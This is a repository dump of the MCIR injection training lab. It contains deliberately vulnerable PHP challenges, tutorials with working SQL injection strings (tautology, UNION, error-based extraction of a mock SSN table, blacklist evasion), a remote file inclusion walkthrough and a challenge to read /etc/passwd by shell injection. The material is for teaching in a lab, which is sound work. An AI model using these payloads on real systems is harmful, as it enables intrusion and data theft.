24 | 25 | 30 | 31 | 36 | 37 | 42 | /> 43 | 44 |
45 |
46 | -------------------------------------------------------------------------------- /cryptomg/index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | header('Location: chosenpt.php'); 15 | 16 | ?> 17 | -------------------------------------------------------------------------------- /cryptomg/style.css: -------------------------------------------------------------------------------- 1 | html,body{ 2 | margin: 0; 3 | } 4 | 5 | #settings{ 6 | text-align: center; 7 | background: #E1E100; 8 | width: 100%; 9 | height: 25px; 10 | } 11 | 12 | #footer{ 13 | position: absolute; 14 | bottom: 0; 15 | background: #000000; 16 | height: 50px; 17 | width: 100%; 18 | color: #FFF; 19 | text-align: center; 20 | } 21 | 22 | #content{ 23 | margin-left: 150px; 24 | margin-top: -75px; 25 | margin-right: 50px; 26 | min-height: 500px; 27 | } 28 | 29 | #nav{ 30 | margin-top: 50px; 31 | } 32 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | mysqldb: 2 | image: mysql 3 | environment: 4 | - MYSQL_ROOT_PASSWORD=mcirpass00112233 5 | - MYSQL_DATABASE=sqlol 6 | 7 | mcir: 8 | image: andresriancho/mcir:latest 9 | ports: 10 | - "8090:80" 11 | links: 12 | - mysqldb 13 | environment: 14 | - APACHE_RUN_USER=www-data 15 | - APACHE_RUN_GROUP=www-data 16 | - APACHE_LOG_DIR=/var/log/apache2/ 17 | 18 | -------------------------------------------------------------------------------- /includes/environ.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | 15 | //Random failure. If enabled, script will die 10% of the time. 16 | //This simulates a buggy application and highlights the issue with boolean-based blind injection. 17 | if(isset($_REQUEST['random_failure'])){ 18 | if(rand(1,10)==10){ 19 | die('
Uh, wait, what was I doing?'); 20 | } 21 | } 22 | 23 | //Random delay. If enabled, script will pause execution up to ten seconds. 24 | //This simulates network latency and highlights the problem with time-based blind injection. 25 | if(isset($_REQUEST['random_delay'])){ 26 | sleep(rand(0,10)); 27 | } 28 | 29 | ?> 30 | -------------------------------------------------------------------------------- /includes/mcir.css: -------------------------------------------------------------------------------- 1 | /* 2 | Magical Code Injection Rainbow - A set of configurable injection testbeds 3 | Daniel "unicornFurnace" Crowley 4 | Copyright (C) 2014 Trustwave Holdings, Inc. 5 | 6 | This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 7 | 8 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. 9 | 10 | You should have received a copy of the GNU General Public License along with this program. If not, see . 
11 | */ 12 | 13 | body{ 14 | background-color:#328563; 15 | color:#122356; 16 | font-family:"Arial","Verdana"; 17 | } 18 | 19 | h1,b{ 20 | font-family:"Courier"; 21 | color:#111111; 22 | } 23 | 24 | table{ 25 | width:100%; 26 | } 27 | 28 | form{ 29 | padding:10px; 30 | background-color:#d0d0d0; 31 | margin-left:auto; 32 | margin-right:auto; 33 | width:60%; 34 | } 35 | 36 | #submit{ 37 | margin-left:auto; 38 | margin-right:auto; 39 | } 40 | 41 | #results{ 42 | padding:10px; 43 | border-style:dashed; 44 | margin-left:auto; 45 | margin-right:auto; 46 | width:60%; 47 | background-color:#d0d0d0; 48 | } 49 | 50 | #challenge{ 51 | padding:10px; 52 | margin-left:auto; 53 | margin-right:auto; 54 | width:60%; 55 | background-color:#d0d0d0; 56 | } 57 | 58 | #mcirnav{ 59 | font-size:150%; 60 | } 61 | 62 | a:visited{ 63 | color:#0000e4; 64 | } 65 | -------------------------------------------------------------------------------- /includes/mcir.nav.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 |
|SQLol||XMLmao||ShelLOL||XSSmh||CryptOMG||RFIdk||PHPwn|
16 | -------------------------------------------------------------------------------- /includes/mcir.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/includes/mcir.png -------------------------------------------------------------------------------- /index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | header('Location: splash/index.php'); 15 | 16 | ?> 17 | -------------------------------------------------------------------------------- /phpwn/challenges.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | include_once('includes/branding.php'); 15 | $mcir['page_name'] = 'Challenges'; 16 | ?> 17 | 18 | 19 | <?php echo $mcir['name'];?> - Challenges 20 | 21 | 22 | 23 |

- Challenges


24 | 25 |
26 |
27 |
28 |
29 | Nothing here yet... 30 |
31 |
32 | 33 | 34 | -------------------------------------------------------------------------------- /phpwn/challenges/tutorial0.txt: -------------------------------------------------------------------------------- 1 | TODO: Write a tutorial on how to complete the challenge 2 | -------------------------------------------------------------------------------- /phpwn/includes/branding.php: -------------------------------------------------------------------------------- 1 | 7 | -------------------------------------------------------------------------------- /phpwn/includes/nav.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 |
16 | | PHP eval injection || Challenges | 17 |
18 | 19 |
20 |
21 |
22 |
23 | -------------------------------------------------------------------------------- /phpwn/index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | header('Location: eval.php'); 15 | 16 | ?> 17 | -------------------------------------------------------------------------------- /rfidk/INSTALL: -------------------------------------------------------------------------------- 1 | Set allow_url_fopen to "On" in your PHP ini file. 2 | -------------------------------------------------------------------------------- /rfidk/challenges.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | include_once('includes/branding.php'); 15 | $mcir['page_name'] = 'Challenges'; 16 | ?> 17 | 18 | 19 | <?php echo $mcir['name'];?> - Challenges 20 | 21 | 22 | 23 |

- Challenges


24 | 25 |
26 |
27 |
28 |
29 | Challenge 0 - http://hello.com/world.php
30 |
31 |
32 | 33 | 34 | -------------------------------------------------------------------------------- /rfidk/challenges/tutorial0.txt: -------------------------------------------------------------------------------- 1 | Challenge 0 - http://hello.com/world.php 2 | 3 | In this challenge, you must provide a URI pointing to a file containing PHP code that runs phpinfo(). We can use our own web server to achieve this. First, we write a quick PHP script: 4 | 5 | $ mkdir evil_files 6 | $ cat > evil_files/phpinfo.txt 7 | 10 | 11 | Next, we need to serve the file. Python has a built-in web server module we can use for this. 12 | 13 | $ cd evil_files 14 | $ python -m SimpleHTTPServer 15 | Serving HTTP on 0.0.0.0 port 8000 ... 16 | 17 | Now we just need to point our vulnerable script at our attacking system, with the following URI: 18 | 19 | http://<your-server-address>:8000/phpinfo.txt 20 | -------------------------------------------------------------------------------- /rfidk/includes/branding.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /rfidk/includes/nav.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 |
16 | | File Inclusion || Challenges | 17 |
18 | 19 |
20 |
21 |
22 |
23 | -------------------------------------------------------------------------------- /rfidk/index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | header('Location: include.php'); 15 | 16 | ?> 17 | -------------------------------------------------------------------------------- /rfidk/pages/date.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /shellol/challenges.htm: -------------------------------------------------------------------------------- 1 | 12 | 13 | 14 | ShellOL - Challenges 15 | 16 | 17 | 18 |

ShellOL - Challenges


19 |
| Shell Command Injection || Challenges |
20 |
21 |
22 |
23 |
24 | Challenge 0 - ;echo Hello world
25 | Challenge 1 - Only semi-effective
26 | Challenge 2 - Only semi-effective pt 2
27 | Challenge 3 - Only semi-effective pt 3
28 | Challenge 4 - Environmentalism
29 | Challenge 5 - The failure of quote filters
30 | Challenge 6 - Best laid plans
31 |
32 |
33 | 34 | 35 | -------------------------------------------------------------------------------- /shellol/challenges/challenge0.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | 17 | ShellOL - Challenge 0 - ; echo Hello world 18 | 19 | 20 | 21 |

ShellOL - Challenge 0 - ; echo Hello world


22 | 23 |
24 |
25 |
26 |
27 | 28 | You must perform the simplest of shell command injection attacks.
29 |
30 | Your objective is to read the contents of either /etc/passwd or C:\boot.ini, depending on your OS. 31 | 32 |
33 | PARAMETERS:
34 | Injection Location - Command argument
35 | Method - GET
36 | Sanitization - None
37 | Output - output shown, error status disclosed, command shown
38 | 
39 | 40 |
41 |
42 | 43 | 44 | 45 | 46 | Injection String:
47 | 48 |
49 |
50 | 51 | 52 | -------------------------------------------------------------------------------- /shellol/includes/nav.inc.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 |
16 | | Shell Command Injection || Challenges | 17 |
18 | 19 |
20 |
21 |
22 |
23 | -------------------------------------------------------------------------------- /shellol/index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | 14 | header('Location: shell.php'); 15 | 16 | ?> 17 | -------------------------------------------------------------------------------- /splash/index.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | The Magical Code Injection Rainbow! 17 | 18 | 19 | 20 |

Magical Code Injection Rainbow


21 |
22 | Welcome to the Magical Code Injection Rainbow!
23 |
24 | 25 | 26 | 27 | -------------------------------------------------------------------------------- /sqlol/challenges/challenge0.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | SQLol - Challenge 0 - Hello, world! 17 | 18 | 19 | 20 |

SQLol - Challenge 0 - Hello, world!


21 | 22 |
23 |
24 |
25 |
26 | 27 | You must perform the simplest of SQL injection attacks.
28 |
29 | Your objective is to get the query to return all usernames instead of just one. 30 | 31 |
32 | PARAMETERS:
33 | Query Type - SELECT query
34 | Injection Type - String value in WHERE clause
35 | Method - GET
36 | Sanitization - None
37 | Output - All results, verbose error messages, query shown
38 | 
39 | 40 |
41 |
42 | 43 | 44 | 45 | 46 | Injection String:
47 | 48 |
49 |
50 | 51 | 52 | -------------------------------------------------------------------------------- /sqlol/challenges/challenge1.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | SQLol - Challenge 1 - SQL Injection 101 17 | 18 | 19 | 20 |

SQLol - Challenge 1 - SQL Injection 101


21 | 22 |
23 |
24 |
25 |
26 | 27 | You must perform a very basic SQL injection attack.
28 |
29 | Your objective is to find the table of social security numbers present in the database and extract its information. 30 | 31 |
32 | PARAMETERS:
33 | Query Type - SELECT query
34 | Injection Type - String value in WHERE clause
35 | Method - GET
36 | Sanitization - None
37 | Output - All results, verbose error messages, query shown
38 | 
39 | 40 |
41 |
42 | 43 | 44 | 45 | 46 | Injection String:
47 | 48 |
49 |
50 | 51 | 52 | -------------------------------------------------------------------------------- /sqlol/challenges/tutorial0.txt: -------------------------------------------------------------------------------- 1 | SQLol Challenge 0 - Hello, world! 2 | ==================== 3 | (Note: These tutorials assume a basic knowledge of SQL. If you are unfamiliar with SQL, please visit http://www.w3schools.com/sql/default.asp) 4 | One of the most basic forms of SQL Injection modifies a query to return all results by effectively removing a WHERE clause. If a WHERE clause has two conditions joined by the OR keyword and one of them is a tautology (a statement that is always true, such as 'a'='a'), the other condition no longer matters: the tautology makes the whole clause true for every row, so the WHERE clause might as well not be there. 5 | 6 | Our SQL query looks like this initially: 7 | SELECT username FROM users WHERE username = 'OUR_INPUT_HERE' GROUP BY username ORDER BY username ASC 8 | 9 | If the query looked like the following, we would retrieve all usernames from the database, not just the one named "myuser": 10 | SELECT username FROM users WHERE username = 'myuser' or 'a'='a' GROUP BY username ORDER BY username ASC 11 | 12 | If we place a single quote into our injection string as such: 13 | myuser' 14 | 15 | Our SQL query looks like this and is syntactically incorrect due to unmatched single quotes, resulting in an error: 16 | SELECT username FROM users WHERE username = 'myuser'' GROUP BY username ORDER BY username ASC 17 | 18 | Our input is not sanitized before being placed in an SQL query, so the quote we supply is parsed as SQL syntax rather than as data, and we can modify the query as we like. (A query that bound the input as a parameter instead of concatenating it into the SQL text would keep the quote as data, and the query's structure could not change.) In order to turn our initial query into the one which returns all users, we can use the following string: 19 | 20 | myuser' or 'a'='a 21 | 22 | When you perform this attack, note the resulting query shown. 
Your injection portion is underlined to highlight how your input modified the query without losing sight of the form the query was initially intended to take. 23 | -------------------------------------------------------------------------------- /sqlol/challenges/tutorial3.txt: -------------------------------------------------------------------------------- 1 | SQLol Challenge 3 - Death Row 2 | ============================ 3 | This challenge is nearly identical to Challenge 1, but with one important difference: Only one row of data is returned at a time. 4 | 5 | We already learned how to use the UNION keyword to pull data from other locations. Next, we must learn how to pull a set of results, one row of data at a time. There are a few different ways to do this. 6 | 7 | MySQL 8 | -------- 9 | The LIMIT and OFFSET keywords can be used to pull a specific number of records from a database beginning at a certain offset from the beginning of the initial result set. For instance, if we wanted to pull two user records starting at the third record in our initial result set, we might use the following query: 10 | 11 | SELECT * FROM users LIMIT 2 OFFSET 2 12 | 13 | We can use these keywords to pull one row and iterate through all results one by one. One drawback to the LIMIT and OFFSET keywords is that they must appear after GROUP BY and ORDER BY keywords, which are at the end of our initial query. As such, we comment out the end using a space and a hash ( #). The injection strings we would use for MySQL to pull the names and social security numbers from the ssn table would be like the following: 14 | 15 | ' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 0 # 16 | ' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 1 OFFSET 1 # 17 | ... 
18 | -------------------------------------------------------------------------------- /sqlol/challenges/tutorial4.txt: -------------------------------------------------------------------------------- 1 | SQLol Challenge 4 - War on Error 2 | ================================ 3 | In this challenge, we do not see any of the result set. What we DO see is verbose error messages. While some would mistakenly assume that this is a blind SQL injection challenge, data extraction can be achieved without the use of blind SQL injection techniques. Certain error messages will disclose information pulled from the database. 4 | 5 | MySQL 6 | ----- 7 | The "ExtractValue" function in MySQL runs an XPath query against a string representing XML data. The function takes input in the following form: 8 | 9 | ExtractValue('xmldatahere', 'xpathqueryhere') 10 | 11 | If the XPath query is syntactically incorrect, we are presented with an error message: 12 | 13 | XPATH syntax error: 'xpathqueryhere' 14 | 15 | Provided that they return a single string value, we can replace strings with select queries surrounded by parentheses, hereafter referred to as "subselects". We can call ExtractValue() in our injection string, and replace the xpath query parameter with a subselect. If the data returned is not a valid xpath query, the data will be revealed in the error message we receive. We can force this to be the case using the concat() function to preface the xpath query with an invalid character, which will cause syntax errors. 16 | 17 | We can pull each row from the ssn table using these injection strings: 18 | 19 | ' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 0)))='a 20 | ' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn) from ssn limit 1 offset 1)))='a 21 | ... 
22 | -------------------------------------------------------------------------------- /sqlol/challenges/tutorial6.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/challenges/tutorial6.txt -------------------------------------------------------------------------------- /sqlol/challenges/tutorial7.txt: -------------------------------------------------------------------------------- 1 | SQLol Challenge 7 - Walking on Thin Ice 2 | ================================= 3 | Not every SQL injection flaw manifests in a SELECT query. When working with an INSERT, UPDATE, or DELETE query, one must be very careful: The wrong input can cause catastrophic damage to the contents of a database. If you use "' or 1=1--" as a string to detect SQL injection in an application and it lands in the WHERE clause of a DELETE query, the condition becomes true for every row and every row is deleted: you might as well have just dropped the table. 4 | 5 | This is our task here: 6 | -------------------------------------------------------------------------------- /sqlol/challenges/tutorial8.txt: -------------------------------------------------------------------------------- 1 | SQLol Challenge 8 - Black Comedy 2 | ==================== 3 | If you've been in information security long enough, you've heard that blacklisting is bad. In "Black Comedy", our task is to evade a particularly primitive blacklist filter. 4 | 5 | The filter removes the following keywords: 6 | union,select,where,and,or,--,# 7 | 8 | There is a fatal flaw in the way that the blacklist filter is implemented: it matches keywords case-sensitively, while the database treats SQL keywords as case-insensitive. As such, we can use keywords like "union" and "select" by using altered case. For instance, we can use "uNion" and avoid filtering. We can't change the case of our comment delimiters (the "--" and "#") so we'll need to avoid using the comment technique. 
This is simple, we can just use two union statements as we have seen in previous challenges. 9 | 10 | Here's an example of an attack string that will work: 11 | 12 | ' uNion seLect concat(name,':',ssn) from ssn uNion selEct null from users whEre username=' 13 | 14 | -------------------------------------------------------------------------------- /sqlol/challenges/tutorial9.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/challenges/tutorial9.txt -------------------------------------------------------------------------------- /sqlol/custom.php: -------------------------------------------------------------------------------- 1 | . 12 | */ 13 | ?> 14 | 15 | 16 | 17 | SQLol - Custom query 18 | 19 | 20 | 21 |

SQLol - Custom query


22 | 26 | 27 | Original Query (*INJECT* specifies injection point): 28 | 29 | 30 | 31 |
32 | 33 | ' . $_REQUEST['inject_string'] . '', $_REQUEST['location']); 42 | 43 | include('includes/database.inc.php'); 44 | 45 | } 46 | ?> 47 |
48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/adodb.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/copyright/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/dictionaries/dregad.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | adodb 5 | mssql 6 | mssqlnative 7 | 8 | 9 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/inspectionProfiles/Project_Default.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 6 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/inspectionProfiles/profiles_settings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/.mailmap: -------------------------------------------------------------------------------- 1 | Andreas Fernandez 2 | Mike Benoit MikeB 3 | Mike Benoit mike.benoit 4 | 5 | 
-------------------------------------------------------------------------------- /sqlol/includes/adodb/adodb-iterator.inc.php: -------------------------------------------------------------------------------- 1 | Execute("select * from adoxyz"); 17 | foreach($rs as $k => $v) { 18 | echo $k; print_r($v); echo "
"; 19 | } 20 | 21 | 22 | Iterator code based on http://cvs.php.net/cvs.php/php-src/ext/spl/examples/cachingiterator.inc?login=2 23 | 24 | 25 | Moved to adodb.inc.php to improve performance. 26 | */ 27 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/adodb-php4.inc.php: -------------------------------------------------------------------------------- 1 | =5.3.2" 31 | }, 32 | 33 | "autoload" : { 34 | "files" : ["adodb.inc.php"] 35 | } 36 | 37 | } 38 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/cute_icons_for_site/adodb.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/includes/adodb/cute_icons_for_site/adodb.gif -------------------------------------------------------------------------------- /sqlol/includes/adodb/cute_icons_for_site/adodb2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/includes/adodb/cute_icons_for_site/adodb2.gif -------------------------------------------------------------------------------- /sqlol/includes/adodb/datadict/datadict-ibase.inc.php: -------------------------------------------------------------------------------- 1 | debug) ADOConnection::outp("AlterColumnSQL not supported"); 57 | return array(); 58 | } 59 | 60 | 61 | function DropColumnSQL($tabname, $flds, $tableflds='', $tableoptions='') 62 | { 63 | if ($this->debug) ADOConnection::outp("DropColumnSQL not supported"); 64 | return array(); 65 | } 66 | 67 | } 68 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/docs/README.md: -------------------------------------------------------------------------------- 1 | # ADOdb Documentation 2 | 3 | ADOdb 
documentation is available in the following locations 4 | 5 | - [Online](http://adodb.org/) 6 | - [Download](https://sourceforge.net/projects/adodb/files/Documentation/) for offline use 7 | 8 | ## Legacy documentation 9 | 10 | The old HTML files are available in 11 | [GitHub](https://github.com/ADOdb/ADOdb/tree/8b8133771ecbe9c95e57abbe5dc3757f0226bfcd/docs), 12 | or in the release zip/tarballs for version 5.20 and before on 13 | [Sourceforge](https://sourceforge.net/projects/adodb/files/adodb-php5-only/). 14 | 15 | ## Changelog 16 | 17 | The full historical [Changelog](changelog.md) is available on GitHub. 18 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/docs/adodb.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/includes/adodb/docs/adodb.gif -------------------------------------------------------------------------------- /sqlol/includes/adodb/docs/adodb2.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SpiderLabs/MCIR/49a292e2c4df90af39b0792d5678579a9f72a6a7/sqlol/includes/adodb/docs/adodb2.gif -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-ado_access.inc.php: -------------------------------------------------------------------------------- 1 | = 5) include(ADODB_DIR."/drivers/adodb-ado5.inc.php"); 21 | else include(ADODB_DIR."/drivers/adodb-ado.inc.php"); 22 | } 23 | 24 | class ADODB_ado_access extends ADODB_ado { 25 | var $databaseType = 'ado_access'; 26 | var $hasTop = 'top'; // support mssql SELECT TOP 10 * FROM TABLE 27 | var $fmtDate = "#Y-m-d#"; 28 | var $fmtTimeStamp = "#Y-m-d h:i:sA#";// note no comma 29 | var $sysDate = "FORMAT(NOW,'yyyy-mm-dd')"; 30 | var $sysTimeStamp = 'NOW'; 31 | var $upperCase = 'ucase'; 32 | 33 | 
/*function BeginTrans() { return false;} 34 | 35 | function CommitTrans() { return false;} 36 | 37 | function RollbackTrans() { return false;}*/ 38 | 39 | } 40 | 41 | 42 | class ADORecordSet_ado_access extends ADORecordSet_ado { 43 | 44 | var $databaseType = "ado_access"; 45 | 46 | function __construct($id,$mode=false) 47 | { 48 | return parent::__construct($id,$mode); 49 | } 50 | } 51 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-informix.inc.php: -------------------------------------------------------------------------------- 1 | _has_mssql_init) { 36 | ADOConnection::outp( "PrepareSP: mssql_init only available since PHP 4.1.0"); 37 | return $sql; 38 | } 39 | if (is_string($sql)) $sql = str_replace('||','+',$sql); 40 | $stmt = mssql_init($sql,$this->_connectionID); 41 | if (!$stmt) return $sql; 42 | return array($sql,$stmt); 43 | } 44 | 45 | function _query($sql,$inputarr=false) 46 | { 47 | if (is_string($sql)) $sql = str_replace('||','+',$sql); 48 | return ADODB_mssql::_query($sql,$inputarr); 49 | } 50 | } 51 | 52 | class ADORecordset_mssqlpo extends ADORecordset_mssql { 53 | var $databaseType = "mssqlpo"; 54 | function __construct($id,$mode=false) 55 | { 56 | parent::__construct($id,$mode); 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-oci805.inc.php: -------------------------------------------------------------------------------- 1 | 0) { 39 | if ($offset > 0) $nrows += $offset; 40 | $sql = "select * from ($sql) where rownum <= $nrows"; 41 | $nrows = -1; 42 | } 43 | */ 44 | 45 | return ADOConnection::SelectLimit($sql,$nrows,$offset,$inputarr,$secs2cache); 46 | } 47 | } 48 | 49 | class ADORecordset_oci805 extends ADORecordset_oci8 { 50 | var $databaseType = "oci805"; 51 | function __construct($id,$mode=false) 52 | { 53 | parent::__construct($id,$mode); 54 | } 55 | } 56 | 
-------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-odbtp_unicode.inc.php: -------------------------------------------------------------------------------- 1 | 14 | 15 | // security - hide paths 16 | if (!defined('ADODB_DIR')) die(); 17 | 18 | /* 19 | Because the ODBTP server sends and reads UNICODE text data using UTF-8 20 | encoding, the following HTML meta tag must be included within the HTML 21 | head section of every HTML form and script page: 22 | 23 | 24 | 25 | Also, all SQL query strings must be submitted as UTF-8 encoded text. 26 | */ 27 | 28 | if (!defined('_ADODB_ODBTP_LAYER')) { 29 | include(ADODB_DIR."/drivers/adodb-odbtp.inc.php"); 30 | } 31 | 32 | class ADODB_odbtp_unicode extends ADODB_odbtp { 33 | var $databaseType = 'odbtp'; 34 | var $_useUnicodeSQL = true; 35 | } 36 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-pdo_mssql.inc.php: -------------------------------------------------------------------------------- 1 | hasTransactions = false; ## <<< BUG IN PDO mssql driver 26 | $parentDriver->_bindInputArray = false; 27 | $parentDriver->hasInsertID = true; 28 | } 29 | 30 | function ServerInfo() 31 | { 32 | return ADOConnection::ServerInfo(); 33 | } 34 | 35 | function SelectLimit($sql,$nrows=-1,$offset=-1,$inputarr=false,$secs2cache=0) 36 | { 37 | $ret = ADOConnection::SelectLimit($sql,$nrows,$offset,$inputarr,$secs2cache); 38 | return $ret; 39 | } 40 | 41 | function SetTransactionMode( $transaction_mode ) 42 | { 43 | $this->_transmode = $transaction_mode; 44 | if (empty($transaction_mode)) { 45 | $this->Execute('SET TRANSACTION ISOLATION LEVEL READ COMMITTED'); 46 | return; 47 | } 48 | if (!stristr($transaction_mode,'isolation')) $transaction_mode = 'ISOLATION LEVEL '.$transaction_mode; 49 | $this->Execute("SET TRANSACTION ".$transaction_mode); 50 | } 51 | 52 | function 
MetaTables($ttype=false,$showSchema=false,$mask=false) 53 | { 54 | return false; 55 | } 56 | 57 | function MetaColumns($table,$normalize=true) 58 | { 59 | return false; 60 | } 61 | 62 | } 63 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-pdo_sqlsrv.inc.php: -------------------------------------------------------------------------------- 1 | hasTransactions = true; 16 | $parentDriver->_bindInputArray = true; 17 | $parentDriver->hasInsertID = true; 18 | $parentDriver->fmtTimeStamp = "'Y-m-d H:i:s'"; 19 | $parentDriver->fmtDate = "'Y-m-d'"; 20 | } 21 | 22 | function BeginTrans() 23 | { 24 | $returnval = parent::BeginTrans(); 25 | return $returnval; 26 | } 27 | 28 | function MetaColumns($table, $normalize = true) 29 | { 30 | return false; 31 | } 32 | 33 | function MetaTables($ttype = false, $showSchema = false, $mask = false) 34 | { 35 | return false; 36 | } 37 | 38 | function SelectLimit($sql, $nrows = -1, $offset = -1, $inputarr = false, $secs2cache = 0) 39 | { 40 | $ret = ADOConnection::SelectLimit($sql, $nrows, $offset, $inputarr, $secs2cache); 41 | return $ret; 42 | } 43 | 44 | function ServerInfo() 45 | { 46 | return ADOConnection::ServerInfo(); 47 | } 48 | 49 | } 50 | -------------------------------------------------------------------------------- /sqlol/includes/adodb/drivers/adodb-postgres.inc.php: -------------------------------------------------------------------------------- 1 | GetOne("SELECT lastval()") 38 | : $this->GetOne("SELECT currval(pg_get_serial_sequence('$table', '$column'))"); 39 | } 40 | } 41 | 42 | class ADORecordSet_postgres8 extends ADORecordSet_postgres7 43 | { 44 | var $databaseType = "postgres8"; 45 | } 46 | 47 | class ADORecordSet_assoc_postgres8 extends ADORecordSet_assoc_postgres7 48 | { 49 | var $databaseType = "postgres8"; 50 | } 51 | -------------------------------------------------------------------------------- 
/sqlol/includes/adodb/drivers/adodb-postgres9.inc.php: -------------------------------------------------------------------------------- 1 | 3 | $ADODB_LANG_ARRAY = array ( 4 | 'LANG' => 'ar', 5 | DB_ERROR => 'خطأ غير محدد', 6 | DB_ERROR_ALREADY_EXISTS => 'موجود مسبقا', 7 | DB_ERROR_CANNOT_CREATE => 'لا يمكن إنشاء', 8 | DB_ERROR_CANNOT_DELETE => 'لا يمكن حذف', 9 | DB_ERROR_CANNOT_DROP => 'لا يمكن حذف', 10 | DB_ERROR_CONSTRAINT => 'عملية إدخال ممنوعة', 11 | DB_ERROR_DIVZERO => 'عملية التقسيم على صفر', 12 | DB_ERROR_INVALID => 'غير صحيح', 13 | DB_ERROR_INVALID_DATE => 'صيغة وقت أو تاريخ غير صحيحة', 14 | DB_ERROR_INVALID_NUMBER => 'صيغة رقم غير صحيحة', 15 | DB_ERROR_MISMATCH => 'غير متطابق', 16 | DB_ERROR_NODBSELECTED => 'لم يتم إختيار قاعدة البيانات بعد', 17 | DB_ERROR_NOSUCHFIELD => 'ليس هنالك حقل بهذا الاسم', 18 | DB_ERROR_NOSUCHTABLE => 'ليس هنالك جدول بهذا الاسم', 19 | DB_ERROR_NOT_CAPABLE => 'قاعدة البيانات المرتبط بها غير قادرة', 20 | DB_ERROR_NOT_FOUND => 'لم يتم إيجاده', 21 | DB_ERROR_NOT_LOCKED => 'غير مقفول', 22 | DB_ERROR_SYNTAX => 'خطأ في الصيغة', 23 | DB_ERROR_UNSUPPORTED => 'غير مدعوم', 24 | DB_ERROR_VALUE_COUNT_ON_ROW => 'عدد القيم في السجل', 25 | DB_ERROR_INVALID_DSN => 'DSN غير صحيح', 26 | DB_ERROR_CONNECT_FAILED => 'فشل عملية الإتصال', 27 | 0 => 'ليس هنالك أخطاء', // DB_OK 28 | DB_ERROR_NEED_MORE_DATA => 'البيانات المزودة غير كافية', 29 | DB_ERROR_EXTENSION_NOT_FOUND=> 'لم يتم إيجاد الإضافة المتعلقة', 30 | DB_ERROR_NOSUCHDB => 'ليس هنالك قاعدة بيانات بهذا الاسم', 31 | DB_ERROR_ACCESS_VIOLATION => 'سماحيات غير كافية' 32 | ); 33 | -------------------------------------------------------------------------------- 